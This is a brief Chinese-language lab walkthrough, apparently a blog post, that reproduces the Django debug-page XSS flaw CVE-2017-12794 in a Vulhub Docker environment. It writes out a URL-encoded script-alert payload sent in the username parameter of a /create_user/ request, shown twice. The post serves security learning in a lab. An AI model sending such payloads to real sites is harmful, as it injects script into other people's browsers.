Django debug page XSS漏洞(CVE-2017-12794)漏洞复现

声明

严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !

目录

一、环境搭建:

二、攻击复现:


一、环境搭建:

用Kali的docker启动Vulhub

Django debug page XSS漏洞(CVE-2017-12794)漏洞复现_第1张图片

 访问http://192.168.xxx.xxx:8000/

Django debug page XSS漏洞(CVE-2017-12794)漏洞复现_第2张图片

 

二、攻击复现:

Xss注入攻击

http://192.168.xxx.xxx:8000/create_user/?username=%3Cscript%3Ealert(123)%3C/script%3E

Django debug page XSS漏洞(CVE-2017-12794)漏洞复现_第3张图片

 

再次注入

http://192.168.xxx.xxx:8000/create_user/?username=%3Cscript%3Ealert(123)%3C/script%3E

Django debug page XSS漏洞(CVE-2017-12794)漏洞复现_第4张图片

 攻击成功

你可能感兴趣的:(docker,漏洞复现,xss,安全,web安全)